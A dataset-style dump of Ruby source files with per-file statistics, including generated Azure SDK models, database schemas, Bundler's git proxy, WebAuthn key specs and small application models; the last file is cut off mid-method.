hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
7aa24f9d9fddf3139062a19e0aae039a030c7965 | 417 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# Enumeration of the accepted SKU family values for an ExpressRoute
# circuit; each value is serialized as its literal string name.
module Azure::Network::Mgmt::V2019_09_01
  module Models
    #
    # Defines values for ExpressRouteCircuitSkuFamily
    #
    module ExpressRouteCircuitSkuFamily
      # Declare each family constant from its wire name so the constant
      # name and the serialized value are guaranteed to stay in sync.
      %w[UnlimitedData MeteredData].each do |family|
        const_set(family, family)
      end
    end
  end
end
| 24.529412 | 70 | 0.731415 |
117de657b7e0311258142e1c0a5726df2f2d3205 | 1,098 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
# Schema for a small workout-tracking domain. Exercises point at a piece
# of equipment and a muscle group via plain integer columns; no database
# level foreign-key constraints are declared here.
ActiveRecord::Schema.define(version: 3) do
  create_table "equipments", force: :cascade do |t|
    t.string "name"
  end
  create_table "exercises", force: :cascade do |t|
    t.string "name"
    t.string "description"
    # Integer references to equipments.id and muscle_groups.id.
    t.integer "equipment_id"
    t.integer "muscle_group_id"
  end
  create_table "muscle_groups", force: :cascade do |t|
    t.string "name"
  end
end
| 35.419355 | 86 | 0.752277 |
189026e7d3be3e141a474469c9c21739b8e87e97 | 689 | class Animal # ENCAPSULATION
attr_reader :species # ENCAPSULATION: species is readable but not writable

# Generic movement behaviour; subclasses override this and may call `super`.
def move # POLYMORPHISM
  puts 'Animal moves'
end

# Eats +food+ when one is given; prints nothing when food is nil.
def consume(food = nil) # POLYMORPHISM
  puts "I consume #{food} like a savage" if food
end

private # Abstraction / Information Hiding

# NOTE(review): `initialize` is private by default in Ruby, so the
# explicit `private` above documents intent but does not change
# how `Animal.new` behaves.
def initialize(species)
  @species = species
end
end
# Specialised Animal demonstrating inheritance: overrides movement and
# eating behaviour while delegating shared logic to the superclass.
class Human < Animal # Inheritance
  attr_reader :name

  # Prints the human-specific message, then falls through to Animal#move.
  def move # POLYMORPHISM
    puts 'Human moves'
    super
  end

  # Overrides Animal#consume: the requested +food+ (required, no default)
  # is ignored and the superclass is always invoked with 'apple'.
  def consume(food) # POLYMORPHISM
    puts 'We are not savages'
    super('apple')
  end

  private # Abstraction / Information Hiding

  # Stores the person's name and registers the species as 'human'.
  def initialize(name)
    @name = name
    super('human')
  end
end
# `p` echoes the newly created Human instance (inspect form).
p kelly = Human.new("Kelly")
# BUG FIX: Human#consume declares one required parameter (no default), so
# the original bare `kelly.consume()` raised ArgumentError before any of
# the polymorphism demo could run. Pass a food item; the override ignores
# it and delegates `super('apple')` regardless.
kelly.consume('apple')
| 16.404762 | 50 | 0.677794 |
6ae67ac4d980a589660b977e93ee636146f1a9d5 | 1,561 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::BatchAI::Mgmt::V2018_03_01
  module Models
    #
    # Describes a reference to Key Vault Key.
    #
    class KeyVaultKeyReference
      include MsRestAzure

      # @return [ResourceId] Fully qualified resource Id for the Key Vault.
      attr_accessor :source_vault

      # @return [String] The URL referencing a key in a Key Vault.
      attr_accessor :key_url

      #
      # Mapper for KeyVaultKeyReference class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      # NOTE(review): auto-generated by AutoRest — both sourceVault and
      # keyUrl are required on the wire even though the accessors allow nil.
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'KeyVaultKeyReference',
          type: {
            name: 'Composite',
            class_name: 'KeyVaultKeyReference',
            model_properties: {
              source_vault: {
                client_side_validation: true,
                required: true,
                serialized_name: 'sourceVault',
                type: {
                  name: 'Composite',
                  class_name: 'ResourceId'
                }
              },
              key_url: {
                client_side_validation: true,
                required: true,
                serialized_name: 'keyUrl',
                type: {
                  name: 'String'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 26.457627 | 75 | 0.532992 |
79c8a33404d40d8c3ca9715212db56e64b756d0b | 5,472 | module Bundler
module Source
  class Git < Path
    # Raised when the `git` executable cannot be found at all.
    class GitNotInstalledError < GitError
      def initialize
        msg = "You need to install git to be able to use gems from git repositories. "
        msg << "For help installing git, please refer to GitHub's tutorial at https://help.github.com/articles/set-up-git"
        super msg
      end
    end

    # Raised when a git command is attempted while the proxy's allow block
    # forbids it (i.e. at application runtime rather than during
    # `bundle install`).
    class GitNotAllowedError < GitError
      def initialize(command)
        msg = "Bundler is trying to run a `git #{command}` at runtime. You probably need to run `bundle install`. However, "
        msg << "this error message could probably be more useful. Please submit a ticket at http://github.com/bundler/bundler/issues "
        msg << "with steps to reproduce as well as the following\n\nCALLER: #{caller.join("\n")}"
        super msg
      end
    end

    # Raised when a git command exits with a non-zero status.
    class GitCommandError < GitError
      def initialize(command, path = nil)
        msg = "Git error: command `git #{command}` in directory #{Dir.pwd} has failed."
        msg << "\nIf this error persists you could try removing the cache directory '#{path}'" if path && path.exist?
        super msg
      end
    end

    # The GitProxy is responsible to interact with git repositories.
    # All actions required by the Git source is encapsulated in this
    # object.
    class GitProxy
      attr_accessor :path, :uri, :ref
      attr_writer :revision

      # @param path     [Pathname] local cache directory for the bare mirror
      # @param uri      [String]   remote repository URI
      # @param ref      [String]   branch/tag/SHA requested in the Gemfile
      # @param revision [String, nil] resolved commit SHA, if already known
      # @param allow    [Proc]     guard deciding whether git may be invoked;
      #                            defaults to always allowed
      def initialize(path, uri, ref, revision=nil, &allow)
        @path = path
        @uri = uri
        @ref = ref
        @revision = revision
        @allow = allow || Proc.new { true }
      end

      # Resolved commit SHA for +ref+, memoized.
      def revision
        @revision ||= allowed_in_path { git("rev-parse #{ref}").strip }
      end

      # Name of the currently checked-out branch, memoized.
      def branch
        @branch ||= allowed_in_path do
          git("branch") =~ /^\* (.*)$/ && $1.strip
        end
      end

      # True when +commit+ is contained in the currently checked-out branch.
      def contains?(commit)
        allowed_in_path do
          result = git_null("branch --contains #{commit}")
          $? == 0 && result =~ /^\* (.*)$/
        end
      end

      # Ensures the bare mirror at +path+ exists and is up to date:
      # fetches when it already exists (skipped if the wanted revision is
      # already cached), clones otherwise.
      def checkout
        if path.exist?
          return if has_revision_cached?
          Bundler.ui.info "Updating #{uri}"
          in_path do
            git %|fetch --force --quiet --tags #{uri_escaped} "refs/heads/*:refs/heads/*"|
          end
        else
          Bundler.ui.info "Fetching #{uri}"
          FileUtils.mkdir_p(path.dirname)
          clone_command = %|clone #{uri_escaped} "#{path}" --bare --no-hardlinks|
          clone_command = "#{clone_command} --quiet" if Bundler.ui.quiet?
          git clone_command
        end
      end

      # Materializes the cached repository at +destination+ pinned to
      # @revision, optionally initializing submodules.
      def copy_to(destination, submodules=false)
        unless File.exist?(destination.join(".git"))
          FileUtils.mkdir_p(destination.dirname)
          FileUtils.rm_rf(destination)
          git %|clone --no-checkout "#{path}" "#{destination}"|
          File.chmod((0777 & ~File.umask), destination)
        end
        SharedHelpers.chdir(destination) do
          git %|fetch --force --quiet --tags "#{path}"|
          git "reset --hard #{@revision}"
          if submodules
            git "submodule update --init --recursive"
          end
        end
      end

      private

      # TODO: Do not rely on /dev/null.
      # Given that open3 is not cross platform until Ruby 1.9.3,
      # the best solution is to pipe to /dev/null if it exists.
      # If it doesn't, everything will work fine, but the user
      # will get the $stderr messages as well.
      def git_null(command)
        if !Bundler::WINDOWS && File.exist?("/dev/null")
          git("#{command} 2>/dev/null", false)
        else
          git(command, false)
        end
      end

      # Runs `git <command>` (with retries), raising unless git is both
      # installed and currently allowed; raises GitCommandError on a
      # non-zero exit when +check_errors+ is true. Returns stdout.
      def git(command, check_errors=true)
        raise GitNotAllowedError.new(command) unless allow?
        raise GitNotInstalledError.new unless Bundler.git_present?
        Bundler::Retry.new("git #{command}").attempts do
          out = SharedHelpers.with_clean_git_env { %x{git #{command}} }
          raise GitCommandError.new(command, path) if check_errors && !$?.success?
          out
        end
      end

      # True when @revision is already present in the local mirror.
      def has_revision_cached?
        return unless @revision
        in_path { git("cat-file -e #{@revision}") }
        true
      rescue GitError
        false
      end

      # Escape the URI for git commands
      def uri_escaped
        if Bundler::WINDOWS
          # Windows quoting requires double quotes only, with double quotes
          # inside the string escaped by being doubled.
          '"' + uri.gsub('"') {|s| '""'} + '"'
        else
          # Bash requires single quoted strings, with the single quotes escaped
          # by ending the string, escaping the quote, and restarting the string.
          "'" + uri.gsub("'") {|s| "'\\''"} + "'"
        end
      end

      def allow?
        @allow.call
      end

      # Ensures the repo exists locally, then chdirs into it for the block.
      def in_path(&blk)
        checkout unless path.exist?
        SharedHelpers.chdir(path, &blk)
      end

      # Runs the block inside the repo path when allowed, otherwise raises.
      def allowed_in_path
        if allow?
          in_path { yield }
        else
          raise GitError, "The git source #{uri} is not yet checked out. Please run `bundle install` before trying to start your application"
        end
      end
    end
  end
end
end
| 33.570552 | 143 | 0.55117 |
ed1f8c806b90a41163ff2e7e5f8ad4ab1099a663 | 5,132 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
  module Ads
    module GoogleAds
      module V8
        module Services
          # NOTE(review): generated protobuf message shells — all behaviour
          # comes from the MessageExts mixins; the YARD tags document the
          # proto fields.
          # Request message for {::Google::Ads::GoogleAds::V8::Services::SmartCampaignSettingService::Client#get_smart_campaign_setting SmartCampaignSettingService.GetSmartCampaignSetting}.
          # @!attribute [rw] resource_name
          #   @return [::String]
          #     Required. The resource name of the Smart campaign setting to fetch.
          class GetSmartCampaignSettingRequest
            include ::Google::Protobuf::MessageExts
            extend ::Google::Protobuf::MessageExts::ClassMethods
          end

          # Request message for
          # [SmartCampaignSettingService.MutateSmartCampaignSetting][].
          # @!attribute [rw] customer_id
          #   @return [::String]
          #     Required. The ID of the customer whose Smart campaign settings are being modified.
          # @!attribute [rw] operations
          #   @return [::Array<::Google::Ads::GoogleAds::V8::Services::SmartCampaignSettingOperation>]
          #     Required. The list of operations to perform on individual Smart campaign settings.
          # @!attribute [rw] partial_failure
          #   @return [::Boolean]
          #     If true, successful operations will be carried out and invalid
          #     operations will return errors. If false, all operations will be carried
          #     out in one transaction if and only if they are all valid.
          #     Default is false.
          # @!attribute [rw] validate_only
          #   @return [::Boolean]
          #     If true, the request is validated but not executed. Only errors are
          #     returned, not results.
          # @!attribute [rw] response_content_type
          #   @return [::Google::Ads::GoogleAds::V8::Enums::ResponseContentTypeEnum::ResponseContentType]
          #     The response content type setting. Determines whether the mutable resource
          #     or just the resource name should be returned post mutation.
          class MutateSmartCampaignSettingsRequest
            include ::Google::Protobuf::MessageExts
            extend ::Google::Protobuf::MessageExts::ClassMethods
          end

          # A single operation to update Smart campaign settings for a campaign.
          # @!attribute [rw] update
          #   @return [::Google::Ads::GoogleAds::V8::Resources::SmartCampaignSetting]
          #     Update operation: The Smart campaign setting must specify a valid
          #     resource name.
          # @!attribute [rw] update_mask
          #   @return [::Google::Protobuf::FieldMask]
          #     FieldMask that determines which resource fields are modified in an update.
          class SmartCampaignSettingOperation
            include ::Google::Protobuf::MessageExts
            extend ::Google::Protobuf::MessageExts::ClassMethods
          end

          # Response message for campaign mutate.
          # @!attribute [rw] partial_failure_error
          #   @return [::Google::Rpc::Status]
          #     Errors that pertain to operation failures in the partial failure mode.
          #     Returned only when partial_failure = true and all errors occur inside the
          #     operations. If any errors occur outside the operations (e.g. auth errors),
          #     we return an RPC level error.
          # @!attribute [rw] results
          #   @return [::Array<::Google::Ads::GoogleAds::V8::Services::MutateSmartCampaignSettingResult>]
          #     All results for the mutate.
          class MutateSmartCampaignSettingsResponse
            include ::Google::Protobuf::MessageExts
            extend ::Google::Protobuf::MessageExts::ClassMethods
          end

          # The result for the Smart campaign setting mutate.
          # @!attribute [rw] resource_name
          #   @return [::String]
          #     Returned for successful operations.
          # @!attribute [rw] smart_campaign_setting
          #   @return [::Google::Ads::GoogleAds::V8::Resources::SmartCampaignSetting]
          #     The mutated Smart campaign setting with only mutable fields after mutate.
          #     The field will only be returned when response_content_type is set to
          #     "MUTABLE_RESOURCE".
          class MutateSmartCampaignSettingResult
            include ::Google::Protobuf::MessageExts
            extend ::Google::Protobuf::MessageExts::ClassMethods
          end
        end
      end
    end
  end
end
| 47.962617 | 189 | 0.643804 |
01f97569b7f18a5bb26625248c1ffd80677ff5cf | 501 | # frozen_string_literal: true
require 'vk/api/responses'
module Vk
  module API
    class Wall < Vk::Schema::Namespace
      module Responses
        # Wraps the server reply to the `wall.unpin` API call; the payload
        # defaults to nil when the server omits it.
        # @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
        class UnpinResponse < Vk::Schema::Response
          # @return [API::Base::OkResponse] @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
          attribute :response, API::Base::OkResponse.optional.default(nil)
        end
      end
    end
  end
end
| 29.470588 | 112 | 0.670659 |
080b3701370ee600bef6f5a93fb434d6a7efe9af | 1,003 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
# Single key/value table backing in-place editable page content.
# Timestamps are NOT NULL; note the legacy 1.8-style hash syntax, which
# matches the Rails version that generated this file.
ActiveRecord::Schema.define(:version => 20120906224210) do
  create_table "contenteditable_contents", :force => true do |t|
    t.string "key"
    t.text "value"
    t.datetime "created_at", :null => false
    t.datetime "updated_at", :null => false
  end
end
| 41.791667 | 86 | 0.754736 |
bfa32dfebd3bd0b99ed3f284de744404ac7003d0 | 383 | name 'ctf01-01'
# Chef cookbook metadata for the ctf01-01 image (the `name 'ctf01-01'`
# directive appears immediately above this block).
maintainer 'Stefan Rusu'
maintainer_email '[email protected]'
license 'MIT'
description 'Installs / Configures ctf01-01'
long_description 'Installs / Configures ctf01-01'
version '0.1.1'
source_url 'https://github.com/SaltwaterC/hackers-dome-images'
issues_url 'https://github.com/SaltwaterC/hackers-dome-images/issues'
# Minimum Chef client version this cookbook is pinned against.
chef_version '12.12.15'
supports 'centos'
d54bd261c435d7424f39e61a14e175cb6738e789 | 5,379 | # frozen_string_literal: true
require 'spec_helper'
require 'webauthn/public_key'
require 'support/seeds'
require 'cose'
require 'openssl'
# Spec for WebAuthn::PublicKey covering both storage formats: the legacy
# U2F uncompressed-point format (migrated credentials) and the native
# COSE key format.
RSpec.describe 'PublicKey' do
  # Credential public key stored in the legacy U2F uncompressed-point format.
  let(:uncompressed_point_public_key) do
    Base64.strict_decode64(seeds[:u2f_migration][:stored_credential][:public_key])
  end

  # Credential public key stored as a COSE key (webauthn native format).
  let(:cose_public_key) do
    Base64.urlsafe_decode64(
      'pQECAyYgASFYIPJKd_-Rl0QtQwbLggjGC_EbUFIMriCkdc2yuaukkBuNIlggaBsBjCwnMzFL7OUGJNm4b-HVpFNUa_NbsHGARuYKHfU'
    )
  end

  let(:webauthn_public_key) { WebAuthn::PublicKey.deserialize(public_key) }

  describe '.deserialize' do
    context 'when invalid public key' do
      let(:public_key) { 'invalidinvalid' }

      it 'should fail' do
        expect { webauthn_public_key }.to raise_error(COSE::MalformedKeyError)
      end
    end
  end

  describe '#pkey' do
    let(:pkey) { webauthn_public_key.pkey }

    context 'when public key stored in uncompressed point format' do
      let(:public_key) { uncompressed_point_public_key }

      it 'should return ssl pkey' do
        expect(pkey).to be_instance_of(OpenSSL::PKey::EC)
      end
    end

    context 'when public key stored in cose format' do
      let(:public_key) { cose_public_key }

      it 'should return ssl pkey' do
        expect(pkey).to be_instance_of(OpenSSL::PKey::EC)
      end
    end
  end

  describe '#cose_key' do
    let(:cose_key) { webauthn_public_key.cose_key }

    context 'when public key stored in uncompressed point format' do
      let(:public_key) { uncompressed_point_public_key }

      it 'should return EC2 cose key' do
        expect(cose_key).to be_instance_of(COSE::Key::EC2)
      end
    end

    context 'when public key stored in cose format' do
      let(:public_key) { cose_public_key }

      it 'should return cose key' do
        expect(cose_key).to be_a(COSE::Key::Base)
      end
    end
  end

  describe '#alg' do
    let(:alg) { webauthn_public_key.alg }

    context 'when public key stored in uncompressed point format' do
      let(:public_key) { uncompressed_point_public_key }

      it 'should return ES256 cose algorithm id' do
        expect(alg).to eq(COSE::Algorithm.by_name('ES256').id)
      end
    end

    context 'when public key stored in cose format' do
      let(:public_key) { cose_public_key }

      it 'should return cose algorithm id' do
        expect(alg).to be_a(Integer)
      end
    end
  end

  describe '#verify' do
    context 'when public key stored in uncompressed point format' do
      let(:public_key) { uncompressed_point_public_key }

      context 'when signature was signed with public key' do
        let(:signature) do
          Base64.strict_decode64(seeds[:u2f_migration][:assertion][:response][:signature])
        end
        let(:authenticator_data) do
          Base64.strict_decode64(seeds[:u2f_migration][:assertion][:response][:authenticator_data])
        end
        let(:client_data_hash) do
          WebAuthn::ClientData.new(
            Base64.strict_decode64(seeds[:u2f_migration][:assertion][:response][:client_data_json])
          ).hash
        end
        # Data to verify is authenticator data concatenated with the hash
        # of the client data JSON.
        let(:verification_data) { authenticator_data + client_data_hash }

        it 'should verify' do
          expect(
            webauthn_public_key.verify(signature, verification_data)
          ).to be_truthy
        end
      end
    end

    context 'when public key stored in cose format' do
      # Signatures below are generated on the fly with a fresh P-256 key.
      let(:signature) { key.sign(hash_algorithm, to_be_signed) }
      let(:to_be_signed) { 'data' }
      let(:hash_algorithm) do
        COSE::Algorithm.find('ES256').hash_function
      end
      let(:cose_key) do
        cose_key = COSE::Key::EC2.from_pkey(key.public_key)
        cose_key.alg = -7
        cose_key
      end
      let(:key) { OpenSSL::PKey::EC.new('prime256v1').generate_key }
      let(:webauthn_public_key) { WebAuthn::PublicKey.new(cose_key: cose_key) }

      it 'works' do
        expect(webauthn_public_key.verify(signature, to_be_signed)).to be_truthy
      end

      context 'when it was signed using a different hash algorithm' do
        let(:hash_algorithm) { 'SHA1' }

        it 'fails' do
          expect(webauthn_public_key.verify(signature, to_be_signed)).to be_falsy
        end
      end

      context 'when it was signed with a different key' do
        let(:signature) do
          OpenSSL::PKey::EC.new('prime256v1').generate_key.sign(
            hash_algorithm,
            to_be_signed
          )
        end

        it 'fails' do
          expect(webauthn_public_key.verify(signature, to_be_signed)).to be_falsy
        end
      end

      context 'when it was signed over different data' do
        let(:signature) { key.sign(hash_algorithm, 'different data') }

        it 'fails' do
          expect(webauthn_public_key.verify(signature, to_be_signed)).to be_falsy
        end
      end

      context 'when public key algorithm is not in COSE' do
        # -1 is not a registered COSE algorithm identifier.
        let(:cose_key) do
          cose_key = COSE::Key::EC2.from_pkey(key.public_key)
          cose_key.alg = -1
          cose_key
        end

        it 'fails' do
          expect { webauthn_public_key.verify(signature, to_be_signed) }.to(
            raise_error(
              WebAuthn::PublicKey::UnsupportedAlgorithm,
              'The public key algorithm -1 is not among the available COSE algorithms'
            )
          )
        end
      end
    end
  end
end
| 29.075676 | 111 | 0.648819 |
62e7859689ecc6e30468f1171ecb55f3b54e94e4 | 2,992 | module UniversalCrm
module Models
  # Mixin that turns an including class into a CRM company document,
  # stored in the `crm_companies` Mongoid collection.
  module Company
    extend ActiveSupport::Concern

    included do
      include Mongoid::Document
      include Mongoid::Timestamps
      include Mongoid::Search
      include Universal::Concerns::Status
      include Universal::Concerns::Kind
      include Universal::Concerns::Numbered
      include Universal::Concerns::Taggable
      include Universal::Concerns::Flaggable
      include Universal::Concerns::Scoped
      include Universal::Concerns::Polymorphic
      include Universal::Concerns::Commentable
      include Universal::Concerns::Employer
      include Universal::Concerns::Tokened
      include Universal::Concerns::HasAttachments
      include Universal::Concerns::Addressed

      store_in session: UniversalCrm::Configuration.mongoid_session_name, collection: 'crm_companies'

      # Single-letter field names keep the Mongo documents compact.
      field :n, as: :name
      field :e, as: :email
      field :p, as: :phone

      has_many :tickets, as: :subject, class_name: 'UniversalCrm::Ticket'

      search_in :n, :e

      statuses %w(active draft blocked), default: :active

      validates :name, presence: true
      # Email may be blank, but must be unique within a scope.
      validates_uniqueness_of :email, allow_blank: true, scope: [:scope_type, :scope_id]

      # numbered_prefix 'CP'
      # default_scope ->(){order_by(created_at: :desc)}

      # Address used to open tickets for this company via inbound email.
      def inbound_email_address(config)
        "cp-#{self.token}@#{config.inbound_domain}"
      end

      # Hash representation of the company (despite the name it returns a
      # Hash, not a JSON string); +config+ supplies the inbound domain.
      def to_json(config)
        return {
          id: self.id.to_s,
          number: self.number.to_s,
          status: self.status,
          name: self.name,
          email: self.email,
          phone: self.phone,
          tags: self.tags,
          flags: self.flags,
          ticket_count: self.tickets.count,
          token: self.token,
          inbound_email_address: self.inbound_email_address(config),
          closed_ticket_count: self.tickets.unscoped.closed.count,
          employee_ids: self.employee_ids,
          employees: self.employees_json,
          address: self.address,
          subject_type: self.subject_type,
          subject_id: self.subject_id.to_s
        }
      end

      # Array of employee summary hashes, including each employee's count
      # of active tickets.
      def employees_json
        a=[]
        self.employees.each do |e|
          a.push({
            id: e.id.to_s,
            name: e.name,
            email: e.email,
            type: e.class.to_s,
            open_ticket_count: e.tickets.active.count
          })
        end
        return a
      end

      # Marks the company blocked and records an audit comment by +user+.
      def block!(user)
        self.comments.create content: 'Company blocked', author: user.name, when: Time.now.utc
        self.blocked!
      end

      # Re-activates the company and records an audit comment by +user+.
      def unblock!(user)
        self.comments.create content: 'Company unblocked', author: user.name, when: Time.now.utc
        self.active!
      end
    end
  end
end
end | 31.829787 | 103 | 0.572193 |
3988169fefe94b213aed24756df02d019cdfd0d1 | 2,181 | #Copyright 2010 Foradian Technologies Private Limited
#This product includes software developed at
#Project Fedena - http://www.projectfedena.org/
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
# FedenaLibrary
# Load the core models so they can be extended with library associations.
require File.join(RAILS_ROOT, "app","models","student.rb")
require File.join(RAILS_ROOT, "app","models","hr","employee.rb")
require File.join(RAILS_ROOT, "app","models","user.rb")
# Wire library associations onto the core models at plugin load time;
# destroying a user first clears their movement/reservation records via
# the before_destroy callback defined on User below.
User.send :has_many,:book_movements, :dependent=>:destroy
User.send :has_many,:book_reservations, :dependent=>:destroy
User.send :before_destroy , :clear_book_movements
Student.send :has_many,:book_movements, :through=>:user
Student.send :has_many,:book_reservations, :through=>:user
Employee.send :has_many,:book_movements, :through=>:user
Employee.send :has_many,:book_reservations, :through=>:user
# Plugin hook object for the Fedena library module: exposes the partials
# rendered into student/employee pages and the deletion-dependency check.
class FedenaLibrary
  unloadable

  # Partial rendered inside the student profile page.
  def self.student_profile_hook
    "shared/student_profile"
  end

  # Partial listing library dependencies blocking student deletion.
  def self.student_dependency_hook
    "shared/student_dependency"
  end

  # Partial listing library dependencies blocking employee deletion.
  def self.employee_dependency_hook
    "shared/employee_dependency"
  end

  # Returns true when +record+ (a Student or Employee) still has books
  # checked out, i.e. its deletion should be blocked. +type+ is accepted
  # for hook-interface compatibility but is not used here.
  def self.dependency_check(record, type)
    # `||` instead of the keyword `or`: identical result here, but avoids
    # the low-precedence pitfalls of the keyword operators.
    if record.class.to_s == "Student" || record.class.to_s == "Employee"
      return true if record.book_movements.all(:conditions=>"status = 'Issued'").present?
    end
    false
  end
end
# Shared helper mixed into Student and Employee below.
module FedenaLibraryBookMovement
  # Returns the book movements that are still checked out ('Issued').
  def issued_books
    self.book_movements.all(:conditions=>"status = 'Issued'")
  end
end
# Reopen Student to expose the issued_books helper.
class Student
  unloadable
  include FedenaLibraryBookMovement
end
# Reopen Employee to expose the issued_books helper.
class Employee
  unloadable
  include FedenaLibraryBookMovement
end
# Reopen User to add the before_destroy cleanup registered above.
class User
  unloadable
  # Removes all movement and reservation records before the user row is
  # destroyed (also registered as :dependent => :destroy on the has_many).
  def clear_book_movements
    self.book_movements.destroy_all
    self.book_reservations.destroy_all
  end
end
| 28.697368 | 89 | 0.770289 |
b984b4d5dcbdca0ff99b382a0d8c28b80f71afdf | 78 | # coding: utf-8
module FormData
  # Release number of the FormData gem, following Semantic Versioning.
  VERSION = '0.1.0'
end
| 11.142857 | 20 | 0.666667 |
11662e539b601762f756010f7e66c9cf818d5d22 | 2,019 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventHub::Mgmt::V2017_04_01
  module Models
    #
    # SKU parameters supplied to the create namespace operation
    #
    class Sku
      include MsRestAzure

      # @return [SkuName] Name of this SKU. Possible values include: 'Basic',
      # 'Standard'
      attr_accessor :name

      # @return [SkuTier] The billing tier of this particular SKU. Possible
      # values include: 'Basic', 'Standard'
      attr_accessor :tier

      # @return [Integer] The Event Hubs throughput units, value should be 0 to
      # 20 throughput units.
      attr_accessor :capacity

      #
      # Mapper for Sku class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      # NOTE(review): auto-generated by AutoRest — only `name` is required
      # on the wire; `capacity` is range-checked (0..20) client-side.
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'Sku',
          type: {
            name: 'Composite',
            class_name: 'Sku',
            model_properties: {
              name: {
                client_side_validation: true,
                required: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              },
              tier: {
                client_side_validation: true,
                required: false,
                serialized_name: 'tier',
                type: {
                  name: 'String'
                }
              },
              capacity: {
                client_side_validation: true,
                required: false,
                serialized_name: 'capacity',
                constraints: {
                  InclusiveMaximum: 20,
                  InclusiveMinimum: 0
                },
                type: {
                  name: 'Number'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 26.565789 | 79 | 0.493314 |
f83842ca4a28ca9f65a893b54a3a4a8470a24c41 | 735 | module ActiveRecord::Turntable
class Mixer
class Fader
# Fader that runs an aggregate query on every shard and merges the
# per-shard results by summing the first column of each row.
class CalculateShardsSumResult < Fader
  # Executes the query on each shard's connection and returns a single
  # merged ActiveRecord::Result whose rows are element-wise sums.
  def execute
    results = @shards_query_hash.map do |shard, query|
      # Work on defensive copies so per-shard execution cannot mutate the
      # shared argument list (the bind values in args[1] in particular).
      args = @args.dup
      args[1] = args[1].dup if args[1].present?
      # BUG FIX: the duplicated `args` was built but the original `@args`
      # was passed through (`*@args`), defeating the defensive copy.
      # Pass the copies instead.
      shard.connection.send(@called_method, query, *args, &@block)
    end
    merge_results(results)
  end

  private

  # Combines the shard results: keeps the first result's columns/types
  # and sums the first value of the corresponding row from every shard.
  def merge_results(results)
    ActiveRecord::Result.new(
      results.first.columns,
      results[0].rows.zip(*results[1..-1].map(&:rows)).map { |r| [r.map(&:first).inject(&:+)] },
      results.first.column_types
    )
  end
end
end
end
end
| 27.222222 | 104 | 0.542857 |
626b9c0a2fb1f1694d5d5ca8534255c31a5fe60b | 2,677 | # frozen_string_literal: true
# A collection of class methods that will be available on classes that include `AwesomeXML`.
module AwesomeXML
  module ClassMethods
    # NOTE(review): `nodes` and `public_nodes` are re-defined further down
    # with memoizing versions, which shadow these attr_readers.
    attr_reader :context, :nodes, :public_nodes
    private :nodes, :public_nodes

    # Takes in a string representing an XML document. Initializes an instance of the class
    # the module was included in and calls `#parse` on it. See there for more info.
    def parse(xml)
      new(xml).parse
    end

    # Takes in a string representing an XPath and assigns it to the class variable `@@context`.
    # This sets the current context node for all nodes defined below it in the class this
    # module is included in.
    # NOTE(review): `||=` means only the first call takes effect; the value
    # actually lives in a class *instance* variable, not `@@context`.
    def set_context(xpath)
      @context ||= xpath
    end

    # Works just like `set_context`, but sets the current context node only for nodes defined
    # inside the block passed to this method.
    def with_context(xpath, &block)
      @local_context = xpath
      yield
      @local_context = nil
    end

    # Defines a method on your class returning a constant.
    def constant_node(name, value, options = {})
      attr_reader name.to_sym
      define_method("parse_#{name}".to_sym) do
        instance_variable_set("@#{name}", value)
      end
      register(name, options[:private])
    end

    # Does not actually define a method, but registers the node name
    # in the `@nodes` attribute.
    def method_node(name)
      define_method("parse_#{name}".to_sym) {}
      register(name, false)
    end

    # Defines a method on your class returning a parsed value
    def node(name, type, options = {}, &block)
      attr_reader name.to_sym
      # Capture any `with_context` xpath in effect at class definition time.
      options[:local_context] = @local_context
      xpath = NodeXPath.new(name, options).xpath
      define_method("parse_#{name}".to_sym) do
        evaluate_args = [xpath, AwesomeXML::Type.for(type, self.class.name), options]
        instance_variable_set(
          "@#{name}",
